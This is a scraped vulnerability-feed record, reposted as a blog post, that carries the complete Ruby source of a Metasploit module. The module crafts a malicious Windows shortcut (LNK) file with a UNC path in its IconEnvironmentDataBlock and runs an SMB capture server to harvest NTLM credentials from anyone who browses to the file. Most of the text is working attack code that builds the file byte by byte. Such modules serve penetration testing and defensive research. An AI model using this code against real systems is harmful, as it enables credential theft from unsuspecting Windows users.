{“lastseen”:”2025-10-01T21:38:28″,”description”:”This module creates a malicious Windows shortcut (LNK) file that specifies a special UNC path in IconEnvironmentDataBlock of Shell Link (.LNK) …”,”published”:”2025-10-01T18:56:05″,”modified”:”2025-10-01T18:56:05″,”type”:”metasploit”,”title”:”IconEnvironmentDataBlock – Windows LNK File Special UNC Path NTLM Leak”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-FILEFORMAT-ICON_ENVIRONMENT_DATABLOCK_LEAK-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘faker’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::FILEFORMAT\\n include Msf::Exploit::Remote::SMB::Server::Share\\n include Msf::Exploit::Remote::SMB::Server::HashCapture\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘IconEnvironmentDataBlock – Windows LNK File Special UNC Path NTLM Leak’,\\n ‘Description’ =\\u003e %q{\\n This module creates a malicious Windows shortcut (LNK) file that\\n specifies a special UNC path in IconEnvironmentDataBlock of Shell Link (.LNK)\\n that can trigger an authentication attempt to a remote server. This can be used\\n to harvest NTLM authentication credentials.\\n\\n When a victim browse to the location of the LNK file, it will attempt to\\n connect to the the specified UNC path, resulting in an SMB connection that\\n can be captured to harvest credentials.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Nafiez’, # Original POC \\u0026 MSF Module\\n ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/zeifan.my\/Right-Click-LNK\/’]\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Targets’ =\\u003e [\\n [‘Windows’, {}]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-05-16’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options([\\n\\n OptString.new(‘DESCRIPTION’, [false, ‘The shortcut description’, nil]),\\n OptString.new(‘ICON_PATH’, [false, ‘The icon path to use (not necessary using real ICON)’, nil]),\\n OptInt.new(‘PADDING_SIZE’, [false, ‘Size of padding in command arguments’, 10])\\n ])\\n end\\n\\n def run\\n description = datastore[‘DESCRIPTION’]\\n icon_path = datastore[‘ICON_PATH’]\\n\\n description = \\”#{Faker::Lorem.sentence(word_count: 3)}Shortcut\\” if description.blank?\\n\\n icon_path = \\”%SystemRoot%\\\\\\\\System32\\\\\\\\#{Faker::File.file_name(ext: ‘ico’)}.to_s}%SystemRoot%\\\\System32\\\\shell32.dll\\” if icon_path.blank?\\n\\n start_smb_capture_server\\n unc_share = datastore[‘SHARE’]\\n unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?\\n unc_path = \\”\\\\\\\\\\\\\\\\#{srvhost}\\\\\\\\\\\\\\\\#{unc_share}\\”\\n lnk_data = create_lnk_file(description, icon_path, unc_path)\\n filename = file_create(lnk_data)\\n print_good(\\”LNK file created: #{filename}\\”)\\n print_status(\\”Listening for hashes on #{srvhost}\\”)\\n\\n stime = Time.now.to_f\\n timeout = datastore[‘ListenerTimeout’].to_i\\n loop do\\n break if timeout \\u003e 0 \\u0026\\u0026 (stime + timeout \\u003c Time.now.to_f)\\n\\n Rex::ThreadSafe.sleep(1)\\n end\\n end\\n\\n def create_lnk_file(description, icon_path, unc_path)\\n data = ”.b\\n\\n # LNK header – 76 bytes\\n header = \\”\\\\x4C\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # LinkCLSID (00021401-0000-0000-C000-000000000046)\\n header += \\”\\\\x01\\\\x14\\\\x02\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xC0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x46\\”.b\\n\\n # Define LinkFlags\\n link_flags = 0x00000000\\n link_flags |= 0x00000004 # HAS_NAME\\n link_flags |= 0x00000020 # HAS_ARGUMENTS\\n link_flags |= 0x00000040 # HAS_ICON_LOCATION\\n link_flags |= 0x00000080 # IS_UNICODE\\n link_flags |= 0x00004000 # HAS_EXP_ICON\\n\\n header += [link_flags].pack(‘V’)\\n\\n # FileAttributes (FILE_ATTRIBUTE_NORMAL)\\n header += \\”\\\\x20\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # CreationTime, AccessTime, WriteTime (zeroed)\\n header += (\\”\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\”.b) * 3\\n\\n # FileSize\\n header += \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # IconIndex\\n header += \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # ShowCommand (SW_SHOWNORMAL)\\n header += \\”\\\\x01\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # HotKey\\n header += \\”\\\\x00\\\\x00\\”.b\\n\\n # Reserved fields\\n header += \\”\\\\x00\\\\x00\\”.b + \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b + \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # Add the header to our binary data\\n data += header\\n\\n # NAME field (description in Unicode)\\n description_utf16 = description.encode(‘UTF-16LE’).b\\n data += [description_utf16.bytesize \/ 2].pack(‘v’)\\n data += description_utf16\\n\\n # ARGUMENTS field (command line arguments in Unicode)\\n padding_size = datastore[‘PADDING_SIZE’]\\n cmd_args = ‘ ‘ * padding_size\\n cmd_args_utf16 = cmd_args.encode(‘UTF-16LE’).b\\n data += [cmd_args_utf16.bytesize \/ 2].pack(‘v’)\\n data += cmd_args_utf16\\n\\n # ICON LOCATION field (icon path in Unicode)\\n icon_path_utf16 = icon_path.encode(‘UTF-16LE’).b\\n data += [icon_path_utf16.bytesize \/ 2].pack(‘v’)\\n data += icon_path_utf16\\n\\n # ExtraData section – ICON ENVIRONMENT DATABLOCK SIGNATURE\\n env_block_size = 0x00000314 # Total size of this block\\n env_block_sig = 0xA0000007 # ICON_ENVIRONMENT_DATABLOCK_SIGNATURE\\n\\n data += [env_block_size].pack(‘V’)\\n data += [env_block_sig].pack(‘V’)\\n\\n # Create fixed-size ANSI buffer with nulls\\n ansi_buffer = \\”\\\\x00\\”.b * 260\\n\\n # Copy the UNC path bytes into the buffer\\n unc_path.bytes.each_with_index do |byte, i|\\n ansi_buffer.setbyte(i, byte) if i \\u003c ansi_buffer.bytesize\\n end\\n\\n data += ansi_buffer\\n\\n # Target field in Unicode (520 bytes)\\n unc_path_utf16 = unc_path.encode(‘UTF-16LE’).b\\n\\n # Create fixed-size Unicode buffer with nulls\\n unicode_buffer = \\”\\\\x00\\”.b * 520\\n\\n # Copy the UTF-16LE encoded UNC path bytes into the buffer\\n unc_path_utf16.bytes.each_with_index do |byte, i|\\n unicode_buffer.setbyte(i, byte) if i \\u003c unicode_buffer.bytesize\\n end\\n\\n data += unicode_buffer\\n\\n data += \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n data\\n end\\n\\n def start_smb_capture_server\\n start_service\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/fileformat\/icon_environment_datablock_leak.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/fileformat\/icon_environment_datablock_leak\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-01T21:38:28″,”description”:”This module creates a malicious Windows shortcut (LNK) file that specifies a special UNC path in IconEnvironmentDataBlock of Shell Link (.LNK) …”,”published”:”2025-10-01T18:56:05″,”modified”:”2025-10-01T18:56:05″,”type”:”metasploit”,”title”:”IconEnvironmentDataBlock – Windows LNK…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-19829","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n